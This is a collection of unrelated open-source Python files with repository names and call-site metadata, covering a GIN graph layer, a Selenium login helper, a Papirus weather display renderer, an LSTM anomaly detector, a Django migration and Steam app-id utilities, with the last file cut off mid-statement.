# Copyright 2021 Research Institute of Systems Planning, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import List, Optional from abc import ABCMeta, abstractmethod from trace_analysis.callback import CallbackBase from trace_analysis.communication import VariablePassing, Communication from trace_analysis.node import Node UNDEFINED_STR = "UNDEFINED" class PathAlias: def __init__(self, alias: str, callback_names: List[str]): self.path_name = alias self.callback_names = callback_names class ArchitectureInterface(metaclass=ABCMeta): @property @abstractmethod def nodes(self) -> List[Node]: pass @property @abstractmethod def path_aliases(self) -> List[PathAlias]: pass @property @abstractmethod def communications(self) -> List[Communication]: pass @property @abstractmethod def variable_passings(self) -> List[VariablePassing]: pass class ArchitectureImporter(ArchitectureInterface): @abstractmethod def __init__(self) -> None: pass @abstractmethod def exec(self, path: str, ignore_topics: Optional[List[str]] = None) -> None: pass class ArchitectureExporter(metaclass=ABCMeta): @abstractmethod def exec(self, architecture: ArchitectureInterface, path) -> None: pass
[]
treehousekingcomic/disrank
disrank/__init__.py
6a6ef3a2f2d4dc81bc3da8064b897dac4c773ef7
from thkc_disrank import *
[]
JakeStevens/benchmarking-gnns
layers/gin_layer.py
a17fdf1b1d758fc65d5eeaf3726f5efa747a4081
import torch import torch.nn as nn import torch.nn.functional as F import dgl.function as fn """ GIN: Graph Isomorphism Networks HOW POWERFUL ARE GRAPH NEURAL NETWORKS? (Keyulu Xu, Weihua Hu, Jure Leskovec and Stefanie Jegelka, ICLR 2019) https://arxiv.org/pdf/1810.00826.pdf """ class GINLayer(nn.Module): """ [!] code adapted from dgl implementation of GINConv Parameters ---------- apply_func : callable activation function/layer or None If not None, apply this function to the updated node feature, the :math:`f_\Theta` in the formula. aggr_type : Aggregator type to use (``sum``, ``max`` or ``mean``). out_dim : Rquired for batch norm layer; should match out_dim of apply_func if not None. dropout : Required for dropout of output features. graph_norm : boolean flag for output features normalization w.r.t. graph sizes. batch_norm : boolean flag for batch_norm layer. residual : boolean flag for using residual connection. init_eps : optional Initial :math:`\epsilon` value, default: ``0``. learn_eps : bool, optional If True, :math:`\epsilon` will be a learnable parameter. """ def __init__(self, apply_func, aggr_type, dropout, graph_norm, batch_norm, residual=False, init_eps=0, learn_eps=False): super().__init__() self.apply_func = apply_func if aggr_type == 'sum': self._reducer = fn.sum elif aggr_type == 'max': self._reducer = fn.max elif aggr_type == 'mean': self._reducer = fn.mean else: raise KeyError('Aggregator type {} not recognized.'.format(aggr_type)) self.graph_norm = graph_norm self.batch_norm = batch_norm self.residual = residual self.dropout = dropout in_dim = apply_func.mlp.input_dim out_dim = apply_func.mlp.output_dim if in_dim != out_dim: self.residual = False # to specify whether eps is trainable or not. if learn_eps: self.eps = torch.nn.Parameter(torch.FloatTensor([init_eps])) else: self.register_buffer('eps', torch.FloatTensor([init_eps])) self.bn_node_h = nn.BatchNorm1d(out_dim) def forward(self, g, h, snorm_n): h_in = h # for residual connection g = g.local_var() g.ndata['h'] = h g.update_all(fn.copy_u('h', 'm'), self._reducer('m', 'neigh')) h = (1 + self.eps) * h + g.ndata['neigh'] if self.apply_func is not None: h = self.apply_func(h) if self.graph_norm: h = h* snorm_n # normalize activation w.r.t. graph size if self.batch_norm: h = self.bn_node_h(h) # batch normalization h = F.relu(h) # non-linear activation if self.residual: h = h_in + h # residual connection h = F.dropout(h, self.dropout, training=self.training) return h class ApplyNodeFunc(nn.Module): """ This class is used in class GINNet Update the node feature hv with MLP """ def __init__(self, mlp): super().__init__() self.mlp = mlp def forward(self, h): h = self.mlp(h) return h class MLP(nn.Module): """MLP with linear output""" def __init__(self, num_layers, input_dim, hidden_dim, output_dim): super().__init__() self.linear_or_not = True # default is linear model self.num_layers = num_layers self.output_dim = output_dim self.input_dim = input_dim if num_layers < 1: raise ValueError("number of layers should be positive!") elif num_layers == 1: # Linear model self.linear = nn.Linear(input_dim, output_dim) else: # Multi-layer model self.linear_or_not = False self.linears = torch.nn.ModuleList() self.batch_norms = torch.nn.ModuleList() self.linears.append(nn.Linear(input_dim, hidden_dim)) for layer in range(num_layers - 2): self.linears.append(nn.Linear(hidden_dim, hidden_dim)) self.linears.append(nn.Linear(hidden_dim, output_dim)) for layer in range(num_layers - 1): self.batch_norms.append(nn.BatchNorm1d((hidden_dim))) def forward(self, x): if self.linear_or_not: # If linear model return self.linear(x) else: # If MLP h = x for i in range(self.num_layers - 1): h = F.relu(self.batch_norms[i](self.linears[i](h))) return self.linears[-1](h)
[((69, 25, 69, 48), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', ({(69, 40, 69, 47): 'out_dim'}, {}), '(out_dim)', True, 'import torch.nn as nn\n'), ((87, 12, 87, 21), 'torch.nn.functional.relu', 'F.relu', ({(87, 19, 87, 20): 'h'}, {}), '(h)', True, 'import torch.nn.functional as F\n'), ((92, 12, 92, 62), 'torch.nn.functional.dropout', 'F.dropout', (), '', True, 'import torch.nn.functional as F\n'), ((76, 21, 76, 40), 'dgl.function.copy_u', 'fn.copy_u', ({(76, 31, 76, 34): '"""h"""', (76, 36, 76, 39): '"""m"""'}, {}), "('h', 'm')", True, 'import dgl.function as fn\n'), ((65, 42, 65, 71), 'torch.FloatTensor', 'torch.FloatTensor', ({(65, 60, 65, 70): '[init_eps]'}, {}), '([init_eps])', False, 'import torch\n'), ((67, 40, 67, 69), 'torch.FloatTensor', 'torch.FloatTensor', ({(67, 58, 67, 68): '[init_eps]'}, {}), '([init_eps])', False, 'import torch\n'), ((125, 26, 125, 58), 'torch.nn.Linear', 'nn.Linear', ({(125, 36, 125, 45): 'input_dim', (125, 47, 125, 57): 'output_dim'}, {}), '(input_dim, output_dim)', True, 'import torch.nn as nn\n'), ((129, 27, 129, 48), 'torch.nn.ModuleList', 'torch.nn.ModuleList', ({}, {}), '()', False, 'import torch\n'), ((130, 31, 130, 52), 'torch.nn.ModuleList', 'torch.nn.ModuleList', ({}, {}), '()', False, 'import torch\n'), ((132, 32, 132, 64), 'torch.nn.Linear', 'nn.Linear', ({(132, 42, 132, 51): 'input_dim', (132, 53, 132, 63): 'hidden_dim'}, {}), '(input_dim, hidden_dim)', True, 'import torch.nn as nn\n'), ((135, 32, 135, 65), 'torch.nn.Linear', 'nn.Linear', ({(135, 42, 135, 52): 'hidden_dim', (135, 54, 135, 64): 'output_dim'}, {}), '(hidden_dim, output_dim)', True, 'import torch.nn as nn\n'), ((134, 36, 134, 69), 'torch.nn.Linear', 'nn.Linear', ({(134, 46, 134, 56): 'hidden_dim', (134, 58, 134, 68): 'hidden_dim'}, {}), '(hidden_dim, hidden_dim)', True, 'import torch.nn as nn\n'), ((138, 40, 138, 68), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', ({(138, 56, 138, 66): 'hidden_dim'}, {}), '(hidden_dim)', True, 'import torch.nn as nn\n')]
jedhsu/music
music/distance/aural/diatonic/__init__.py
dea68c4a82296cd4910e786f533b2cbf861377c3
""" *mus . it . dia* The simple diatonic intervals. """ from .second import MinorSecond from .second import MajorSecond from .third import MinorThird from .third import MajorThird from .fourth import PerfectFourth from .fifth import Tritone from .fifth import PerfectFifth from .sixth import MinorSixth from .sixth import MajorSixth from .seventh import MinorSeventh from .seventh import MajorSeventh from .eighth import Octave __all__ = [ "MinorSecond", "MajorSecond", "MinorThird", "MajorThird", "PerfectFourth", "Tritone", "PerfectFifth", "MinorSixth", "MajorSixth", "MinorSeventh", "MajorSeventh", "Octave", ]
[]
AriTheGuitarMan/AriTheGuitarMan.github.io
selenium_tests/test_functions.py
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
# this file holds some common testing functions from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By depurl = "localhost:3000" def getElement(driver, xpath): return WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, xpath))) def login(driver, username, password): driver.get(depurl) elem = getElement(driver, "//input[@id='username']") elem.clear() elem.send_keys(username) elem = getElement(driver, "//input[@id='password']") elem.clear() elem.send_keys(password) elem.send_keys(Keys.RETURN) def logout(driver): elem = getElement(driver, "//a[text()='Logout']") elem.click()
[((9, 43, 9, 92), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', ({(9, 74, 9, 91): '(By.XPATH, xpath)'}, {}), '((By.XPATH, xpath))', True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((9, 11, 9, 36), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', ({(9, 25, 9, 31): 'driver', (9, 33, 9, 35): '(10)'}, {}), '(driver, 10)', False, 'from selenium.webdriver.support.wait import WebDriverWait\n')]
ryuchihoon/WeatherStation
papirus_renderer.py
e3fd210939a961bc1724197f3885964cb4ae5a28
#-- coding: utf-8 -- import sys reload(sys) sys.setdefaultencoding('utf-8') import os import time import collections from PIL import Image, ImageOps, ImageDraw, ImageFont code_2_icono = collections.defaultdict(lambda : '38') kor_2_eng = collections.defaultdict(lambda : 'UNKNOWN') code_2_icono['SKY_O00'] = ['38'] code_2_icono['SKY_O01'] = ['01', '08'] code_2_icono['SKY_O02'] = ['02', '09'] code_2_icono['SKY_O03'] = ['03', '10'] code_2_icono['SKY_O04'] = ['12', '40'] code_2_icono['SKY_O05'] = ['13', '41'] code_2_icono['SKY_O06'] = ['14', '42'] code_2_icono['SKY_O07'] = ['18'] code_2_icono['SKY_O08'] = ['21'] code_2_icono['SKY_O09'] = ['32'] code_2_icono['SKY_O10'] = ['04'] code_2_icono['SKY_O11'] = ['29'] code_2_icono['SKY_O12'] = ['26'] code_2_icono['SKY_O13'] = ['27'] code_2_icono['SKY_O14'] = ['28'] code_2_icono['SKY_W00'] = ['38'] code_2_icono['SKY_W01'] = ['01', '08'] code_2_icono['SKY_W02'] = ['02', '09'] code_2_icono['SKY_W03'] = ['03', '10'] code_2_icono['SKY_W04'] = ['18'] code_2_icono['SKY_W07'] = ['21'] code_2_icono['SKY_W09'] = ['12', '40'] code_2_icono['SKY_W10'] = ['21'] code_2_icono['SKY_W11'] = ['04'] code_2_icono['SKY_W12'] = ['13', '41'] code_2_icono['SKY_W13'] = ['32'] kor_2_eng[u'좋음'] = ['GOOD'] kor_2_eng[u'보통'] = ['NORMAL'] kor_2_eng[u'나쁨'] = ['BAD'] kor_2_eng[u'매우 나쁨'] = ['V BAD'] def geticonfname(code, drawNight=False): l = code_2_icono[code] dname = os.path.join(os.path.dirname(__file__), "resources", "weather_icons_mod") if len(l) > 1 and drawNight: cur_hour = time.localtime().tm_hour is_night = cur_hour < 5 or cur_hour > 18 if is_night: return os.path.join(dname, l[1] + '.png') else: return os.path.join(dname, l[0] + '.png') else: return os.path.join(dname, l[0] + '.png') BLACK = 0 WHITE = 1 class PapirusRenderer: """Renderer for Papirus HAT""" def __init__(self, rotate=0, font_path=None): if font_path: self.font_path = font_path else: self.font_path = "/usr/share/fonts/truetype/freefont/FreeMono.ttf" print("rotate:",rotate) try: from papirus import Papirus self.papirus = Papirus(rotate=rotate) self.canvas_size = self.papirus.size print("papirus size : %s"%str(self.canvas_size)) except ImportError: print("papirus import failed") self.papirus = None self.canvas_size = (264,176) def render(self, weather, weather_forecast): canvas = Image.new('1', self.canvas_size, WHITE) print("font_path:",self.font_path) fname = geticonfname(weather.weather_code, drawNight=True) print("file:",fname) self._drawImage(canvas, fname, 20,10,(100,100)) print("cur desc : %s"%str(weather.weather_desc)) print("cur airq : %s"%str(weather.air_quality)) temperature = str(weather.cur_temperature).split('.')[0] + u" \u2103" self._drawText(canvas, temperature, 70,115, font_size=20, center_horizontal=True) translated = kor_2_eng[weather.air_quality][0] print("cur airq translated: %s"%translated) self._drawText(canvas, translated, 70,140, font_size=20, center_horizontal=True) base_x,base_y = 145,5 for i,w in enumerate(weather_forecast): fname = geticonfname(w.weather_code) self._drawImage(canvas, fname, base_x, base_y+55*i, (50,50)) temperature = str(w.min_temperature) + " / " + str(w.max_temperature) self._drawText(canvas, temperature, base_x+80, base_y+28+55*i, font_size=14, center_horizontal=True) # update time self._drawText(canvas, time.strftime("%Y-%m-%d %H:%M",time.localtime()), 136, 165, font_size=9, center_horizontal=True) if self.papirus == None: # save a image for debugging purpose with open("result.jpg", "wb") as fp: canvas.save(fp) print("result file saved") else: self.papirus.display(canvas) self.papirus.update() def _drawImage(self, canvas, image_path, x, y, size): image = Image.open(image_path) image = ImageOps.grayscale(image) image = image.resize(size) image = image.convert("1", dither=Image.FLOYDSTEINBERG) canvas.paste(image,(x,y)) def _drawText(self, canvas, text, x, y, font_size=20, center_horizontal=False): draw = ImageDraw.Draw(canvas) font = ImageFont.truetype(self.font_path, font_size) text_draw_size = draw.textsize(text, font=font) if center_horizontal: x = x - text_draw_size[0]/2 draw.text( (x, y) , text, font=font, fill=BLACK)
[((5, 0, 5, 31), 'sys.setdefaultencoding', 'sys.setdefaultencoding', ({(5, 23, 5, 30): '"""utf-8"""'}, {}), "('utf-8')", False, 'import sys\n'), ((14, 15, 14, 53), 'collections.defaultdict', 'collections.defaultdict', ({(14, 39, 14, 52): "lambda : '38'"}, {}), "(lambda : '38')", False, 'import collections\n'), ((15, 12, 15, 55), 'collections.defaultdict', 'collections.defaultdict', ({(15, 36, 15, 54): "lambda : 'UNKNOWN'"}, {}), "(lambda : 'UNKNOWN')", False, 'import collections\n'), ((54, 25, 54, 50), 'os.path.dirname', 'os.path.dirname', ({(54, 41, 54, 49): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((63, 15, 63, 49), 'os.path.join', 'os.path.join', ({(63, 28, 63, 33): 'dname', (63, 35, 63, 48): "(l[0] + '.png')"}, {}), "(dname, l[0] + '.png')", False, 'import os\n'), ((95, 17, 95, 56), 'PIL.Image.new', 'Image.new', ({(95, 27, 95, 30): '"""1"""', (95, 32, 95, 48): 'self.canvas_size', (95, 50, 95, 55): 'WHITE'}, {}), "('1', self.canvas_size, WHITE)", False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((131, 16, 131, 38), 'PIL.Image.open', 'Image.open', ({(131, 27, 131, 37): 'image_path'}, {}), '(image_path)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((132, 16, 132, 41), 'PIL.ImageOps.grayscale', 'ImageOps.grayscale', ({(132, 35, 132, 40): 'image'}, {}), '(image)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((139, 15, 139, 37), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', ({(139, 30, 139, 36): 'canvas'}, {}), '(canvas)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((140, 15, 140, 60), 'PIL.ImageFont.truetype', 'ImageFont.truetype', ({(140, 34, 140, 48): 'self.font_path', (140, 50, 140, 59): 'font_size'}, {}), '(self.font_path, font_size)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((56, 19, 56, 35), 'time.localtime', 'time.localtime', ({}, {}), '()', False, 'import time\n'), ((59, 19, 59, 53), 'os.path.join', 'os.path.join', ({(59, 32, 59, 37): 'dname', (59, 39, 59, 52): "(l[1] + '.png')"}, {}), "(dname, l[1] + '.png')", False, 'import os\n'), ((61, 19, 61, 53), 'os.path.join', 'os.path.join', ({(61, 32, 61, 37): 'dname', (61, 39, 61, 52): "(l[0] + '.png')"}, {}), "(dname, l[0] + '.png')", False, 'import os\n'), ((84, 27, 84, 49), 'papirus.Papirus', 'Papirus', (), '', False, 'from papirus import Papirus\n'), ((118, 62, 118, 78), 'time.localtime', 'time.localtime', ({}, {}), '()', False, 'import time\n')]
VForWaTer/hydrobox
hydrobox/discharge/__init__.py
ae7d10bf5aa48bf7daf3d1094e6bb66f0a7ce96b
from .catchment import regime, flow_duration_curve from . import indices
[]
ecmwf-lab/infero
scripts/convert_keras2onnx.py
4fec006175af48cd0313b2f89722c01636e961db
# # (C) Copyright 1996- ECMWF. # # This software is licensed under the terms of the Apache Licence Version 2.0 # which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. # In applying this licence, ECMWF does not waive the privileges and immunities # granted to it by virtue of its status as an intergovernmental organisation # nor does it submit to any jurisdiction. # import os import numpy as np import argparse import keras import keras2onnx if __name__ == "__main__": """ Lightweight script to convert a keras model into a TFlite model """ parser = argparse.ArgumentParser("Data Augmentation") parser.add_argument('keras_model_path', help="Path of the input keras model") parser.add_argument('onnx_model_path', help="Path of the output onnx model") parser.add_argument("--verify_with", help="Check the model by passing an input numpy path") args = parser.parse_args() # load the keras model model = keras.models.load_model(args.keras_model_path) model.summary() # do the conversion onnx_model = keras2onnx.convert_keras(model, model.name) # write to file file = open(args.onnx_model_path, "wb") file.write(onnx_model.SerializeToString()) file.close()
[((23, 13, 23, 57), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({(23, 37, 23, 56): '"""Data Augmentation"""'}, {}), "('Data Augmentation')", False, 'import argparse\n'), ((31, 12, 31, 58), 'keras.models.load_model', 'keras.models.load_model', ({(31, 36, 31, 57): 'args.keras_model_path'}, {}), '(args.keras_model_path)', False, 'import keras\n'), ((35, 17, 35, 60), 'keras2onnx.convert_keras', 'keras2onnx.convert_keras', ({(35, 42, 35, 47): 'model', (35, 49, 35, 59): 'model.name'}, {}), '(model, model.name)', False, 'import keras2onnx\n')]
timcheck/lava-dl
src/lava/lib/dl/slayer/utils/assistant.py
e680722071129fde952ea0d744984aa2a038797a
# Copyright (C) 2022 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause """Assistant utility for automatically load network from network description.""" import torch class Assistant: """Assistant that bundles training, validation and testing workflow. Parameters ---------- net : torch.nn.Module network to train. error : object or lambda an error object or a lambda function that evaluates error. It is expected to take ``(output, target)`` | ``(output, label)`` as it's argument and return a scalar value. optimizer : torch optimizer the learning optimizer. stats : slayer.utils.stats learning stats logger. If None, stats will not be logged. Defaults to None. classifier : slayer.classifier or lambda classifier object or lambda function that takes output and returns the network prediction. None means regression mode. Classification steps are bypassed. Defaults to None. count_log : bool flag to enable count log. Defaults to False. lam : float lagrangian to merge network layer based loss. None means no such additional loss. If not None, net is expected to return the accumulated loss as second argument. It is intended to be used with layer wise sparsity loss. Defaults to None. Attributes ---------- net error optimizer stats classifier count_log lam device : torch.device or None the main device memory where network is placed. It is not at start and gets initialized on the first call. """ def __init__( self, net, error, optimizer, stats=None, classifier=None, count_log=False, lam=None ): self.net = net self.error = error self.optimizer = optimizer self.classifier = classifier self.stats = stats self.count_log = count_log self.lam = lam self.device = None def reduce_lr(self, factor=10 / 3): """Reduces the learning rate of the optimizer by ``factor``. Parameters ---------- factor : float learning rate reduction factor. Defaults to 10/3. Returns ------- """ for param_group in self.optimizer.param_groups: print('\nLearning rate reduction from', param_group['lr']) param_group['lr'] /= factor def train(self, input, target): """Training assistant. Parameters ---------- input : torch tensor input tensor. target : torch tensor ground truth or label. Returns ------- output network's output. count : optional spike count if ``count_log`` is enabled """ self.net.train() if self.device is None: for p in self.net.parameters(): self.device = p.device break device = self.device input = input.to(device) target = target.to(device) count = None if self.count_log is True: if self.lam is None: output, count = self.net(input) else: output, net_loss, count = self.net(input) else: if self.lam is None: output = self.net(input) else: output, net_loss = self.net(input) loss = self.error(output, target) if self.stats is not None: self.stats.training.num_samples += input.shape[0] self.stats.training.loss_sum += loss.cpu().data.item() \ * output.shape[0] if self.classifier is not None: # classification self.stats.training.correct_samples += torch.sum( self.classifier(output) == target ).cpu().data.item() if self.lam is not None: # add net_loss before backward step loss += self.lam * net_loss self.optimizer.zero_grad() loss.backward() self.optimizer.step() if count is None: return output return output, count def test(self, input, target): """Testing assistant. Parameters ---------- input : torch tensor input tensor. target : torch tensor ground truth or label. Returns ------- output network's output. count : optional spike count if ``count_log`` is enabled """ self.net.eval() if self.device is None: for p in self.net.parameters(): self.device = p.device break device = self.device with torch.no_grad(): input = input.to(device) target = target.to(device) count = None if self.count_log is True: if self.lam is None: output, count = self.net(input) else: output, _, count = self.net(input) else: if self.lam is None: output = self.net(input) else: output, _ = self.net(input) loss = self.error(output, target) if self.stats is not None: self.stats.testing.num_samples += input.shape[0] self.stats.testing.loss_sum += loss.cpu().data.item() \ * output.shape[0] if self.classifier is not None: # classification self.stats.testing.correct_samples += torch.sum( self.classifier(output) == target ).cpu().data.item() if count is None: return output return output, count def valid(self, input, target): """Validation assistant. Parameters ---------- input : torch tensor input tensor. target : torch tensor ground truth or label. Returns ------- output network's output. count : optional spike count if ``count_log`` is enabled """ self.net.eval() with torch.no_grad(): device = self.net.device input = input.to(device) target = target.to(device) count = None if self.count_log is True: if self.lam is None: output, count = self.net(input) else: output, _, count = self.net(input) else: if self.lam is None: output = self.net(input) else: output, _ = self.net(input) loss = self.error(output, target) if self.stats is not None: self.stats.validation.num_samples += input.shape[0] if self.lam is None: self.stats.validation.loss_sum += loss.cpu().data.item() \ * output.shape[0] else: self.stats.validation.loss_sum += loss.cpu().data.item() \ * output.shape[0] if self.classifier is not None: # classification self.stats.validation.correct_samples += torch.sum( self.classifier(output) == target ).cpu().data.item() if count is None: return output return output, count
[((173, 13, 173, 28), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n'), ((225, 13, 225, 28), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n')]
cse-icon-dataAnalytics/lstm-anomaly-detect
lstm-synthetic-wave-anomaly-detect.py
bcfb01db383698acbd5692f1a76a5f20ec3629a8
""" Inspired by example from https://github.com/Vict0rSch/deep_learning/tree/master/keras/recurrent Uses the TensorFlow backend The basic idea is to detect anomalies in a time-series. """ import matplotlib.pyplot as plt import numpy as np import time from keras.layers.core import Dense, Activation, Dropout from keras.layers.recurrent import LSTM from keras.models import Sequential from numpy import arange, sin, pi, random np.random.seed(1234) # Global hyper-parameters sequence_length = 100 random_data_dup = 10 # each sample randomly duplicated between 0 and 9 times, see dropin function epochs = 1 batch_size = 50 def dropin(X, y): """ The name suggests the inverse of dropout, i.e. adding more samples. See Data Augmentation section at http://simaaron.github.io/Estimating-rainfall-from-weather-radar-readings-using-recurrent-neural-networks/ :param X: Each row is a training sequence :param y: Tne target we train and will later predict :return: new augmented X, y """ print("X shape:", X.shape) print("y shape:", y.shape) X_hat = [] y_hat = [] for i in range(0, len(X)): for j in range(0, np.random.random_integers(0, random_data_dup)): X_hat.append(X[i, :]) y_hat.append(y[i]) return np.asarray(X_hat), np.asarray(y_hat) def gen_wave(): """ Generate a synthetic wave by adding up a few sine waves and some noise :return: the final wave """ t = np.arange(0.0, 10.0, 0.01) wave1 = sin(2 * 2 * pi * t) noise = random.normal(0, 0.1, len(t)) wave1 = wave1 + noise print("wave1", len(wave1)) wave2 = sin(2 * pi * t) print("wave2", len(wave2)) t_rider = arange(0.0, 0.5, 0.01) wave3 = sin(10 * pi * t_rider) print("wave3", len(wave3)) insert = round(0.8 * len(t)) wave1[insert:insert + 50] = wave1[insert:insert + 50] + wave3 return wave1 + wave2 def z_norm(result): result_mean = result.mean() result_std = result.std() result -= result_mean result /= result_std return result, result_mean def get_split_prep_data(train_start, train_end, test_start, test_end): data = gen_wave() print("Length of Data", len(data)) # train data print "Creating train data..." result = [] for index in range(train_start, train_end - sequence_length): result.append(data[index: index + sequence_length]) result = np.array(result) # shape (samples, sequence_length) result, result_mean = z_norm(result) print "Mean of train data : ", result_mean print "Train data shape : ", result.shape train = result[train_start:train_end, :] np.random.shuffle(train) # shuffles in-place X_train = train[:, :-1] y_train = train[:, -1] X_train, y_train = dropin(X_train, y_train) # test data print "Creating test data..." result = [] for index in range(test_start, test_end - sequence_length): result.append(data[index: index + sequence_length]) result = np.array(result) # shape (samples, sequence_length) result, result_mean = z_norm(result) print "Mean of test data : ", result_mean print "Test data shape : ", result.shape X_test = result[:, :-1] y_test = result[:, -1] print("Shape X_train", np.shape(X_train)) print("Shape X_test", np.shape(X_test)) X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1)) X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1)) return X_train, y_train, X_test, y_test def build_model(): model = Sequential() layers = {'input': 1, 'hidden1': 64, 'hidden2': 256, 'hidden3': 100, 'output': 1} model.add(LSTM( input_length=sequence_length - 1, input_dim=layers['input'], output_dim=layers['hidden1'], return_sequences=True)) model.add(Dropout(0.2)) model.add(LSTM( layers['hidden2'], return_sequences=True)) model.add(Dropout(0.2)) model.add(LSTM( layers['hidden3'], return_sequences=False)) model.add(Dropout(0.2)) model.add(Dense( output_dim=layers['output'])) model.add(Activation("linear")) start = time.time() model.compile(loss="mse", optimizer="rmsprop") print "Compilation Time : ", time.time() - start return model def run_network(model=None, data=None): global_start_time = time.time() if data is None: print 'Loading data... ' # train on first 700 samples and test on next 300 samples (has anomaly) X_train, y_train, X_test, y_test = get_split_prep_data(0, 700, 500, 1000) else: X_train, y_train, X_test, y_test = data print '\nData Loaded. Compiling...\n' if model is None: model = build_model() try: print("Training...") model.fit( X_train, y_train, batch_size=batch_size, nb_epoch=epochs, validation_split=0.05) print("Predicting...") predicted = model.predict(X_test) print("Reshaping predicted") predicted = np.reshape(predicted, (predicted.size,)) except KeyboardInterrupt: print("prediction exception") print 'Training duration (s) : ', time.time() - global_start_time return model, y_test, 0 try: plt.figure(1) plt.subplot(311) plt.title("Actual Test Signal w/Anomalies") plt.plot(y_test[:len(y_test)], 'b') plt.subplot(312) plt.title("Predicted Signal") plt.plot(predicted[:len(y_test)], 'g') plt.subplot(313) plt.title("Squared Error") mse = ((y_test - predicted) ** 2) plt.plot(mse, 'r') plt.show() except Exception as e: print("plotting exception") print str(e) print 'Training duration (s) : ', time.time() - global_start_time return model, y_test, predicted run_network()
[]
btenaglia/hpc-historias-clinicas
hpc-historias-clinicas/historias/migrations/0007_auto_20150425_1459.py
649d8660381381b1c591667760c122d73071d5ec
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import datetime class Migration(migrations.Migration): dependencies = [ ('historias', '0006_auto_20150413_0001'), ] operations = [ migrations.AlterField( model_name='historias', name='fecha_ingreso', field=models.DateField(default=datetime.datetime(2015, 4, 25, 14, 59, 14, 468359), help_text='Formato: dd/mm/yyyy', verbose_name='Fecha de Ingreso'), preserve_default=True, ), migrations.AlterField( model_name='historias', name='hora_ingreso', field=models.TimeField(default=datetime.datetime(2015, 4, 25, 14, 59, 14, 468307), help_text='Formato: hh:mm', verbose_name='Hora de Ingreso'), preserve_default=True, ), migrations.AlterField( model_name='ubicaciones', name='sala', field=models.CharField(max_length=10, choices=[(b'SALA 1', b'SALA 1'), (b'SALA 2', b'SALA 2'), (b'SALA 3', b'SALA 3'), (b'SALA 4', b'SALA 4'), (b'SALA 5', b'SALA 5'), (b'GAURDIA', b'GAURDIA'), (b'NEO', b'NEO'), (b'UTI', b'UTI'), (b'UCO', b'UCO'), (b'PRE PARTO', b'PRE PARTO')]), preserve_default=True, ), ]
[((30, 18, 30, 289), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models, migrations\n'), ((18, 43, 18, 93), 'datetime.datetime', 'datetime.datetime', ({(18, 61, 18, 65): '(2015)', (18, 67, 18, 68): '(4)', (18, 70, 18, 72): '(25)', (18, 74, 18, 76): '(14)', (18, 78, 18, 80): '(59)', (18, 82, 18, 84): '(14)', (18, 86, 18, 92): '(468359)'}, {}), '(2015, 4, 25, 14, 59, 14, 468359)', False, 'import datetime\n'), ((24, 43, 24, 93), 'datetime.datetime', 'datetime.datetime', ({(24, 61, 24, 65): '(2015)', (24, 67, 24, 68): '(4)', (24, 70, 24, 72): '(25)', (24, 74, 24, 76): '(14)', (24, 78, 24, 80): '(59)', (24, 82, 24, 84): '(14)', (24, 86, 24, 92): '(468307)'}, {}), '(2015, 4, 25, 14, 59, 14, 468307)', False, 'import datetime\n')]
Verckolf/MyInterfaceTest
venv/Lib/site-packages/har2case/__about__.py
e05674bd673a6a43cfb33f7cb4318886ba92a05c
__title__ = 'har2case' __description__ = 'Convert HAR(HTTP Archive) to YAML/JSON testcases for HttpRunner.' __url__ = 'https://github.com/HttpRunner/har2case' __version__ = '0.2.0' __author__ = 'debugtalk' __author_email__ = '[email protected]' __license__ = 'Apache-2.0' __copyright__ = 'Copyright 2017 debugtalk'
[]
woctezuma/match-steam-banners
app_id_utils.py
dff1bc2ddf35a37bcdea46a220f5d0257d47e017
import os from pathlib import Path from data_utils import get_data_path, get_image_data_path, get_image_extension def app_id_to_image_filename(app_id, is_horizontal_banner=False): image_data_path = get_image_data_path(is_horizontal_banner) image_filename = image_data_path + str(app_id) + get_image_extension() return image_filename def image_filename_to_app_id(image_filename): base_name = os.path.basename(image_filename) app_id = base_name.strip(get_image_extension()) return app_id def list_app_ids(is_horizontal_banner=False): image_data_path = get_image_data_path(is_horizontal_banner) image_filenames = Path(image_data_path).glob("*" + get_image_extension()) app_ids = [image_filename_to_app_id(filename) for filename in image_filenames] app_ids = sorted(app_ids, key=int) return app_ids def get_frozen_app_ids_filename(): frozen_app_ids_filename = get_data_path() + "frozen_app_ids.txt" return frozen_app_ids_filename def freeze_app_ids(app_ids, output_file_name=None): if output_file_name is None: output_file_name = get_frozen_app_ids_filename() with open(output_file_name, "w", encoding="utf8") as f: for app_id in app_ids: f.write("{}\n".format(app_id)) return def load_frozen_app_ids(input_file_name=None): if input_file_name is None: input_file_name = get_frozen_app_ids_filename() with open(input_file_name, "r", encoding="utf8") as f: # Do not convert to a set object, or any other conversion, because we want to keep the list order as it is. # Just read the list from the file. That is all there is to do. Otherwise, appIDs will be scrambled! frozen_app_ids = 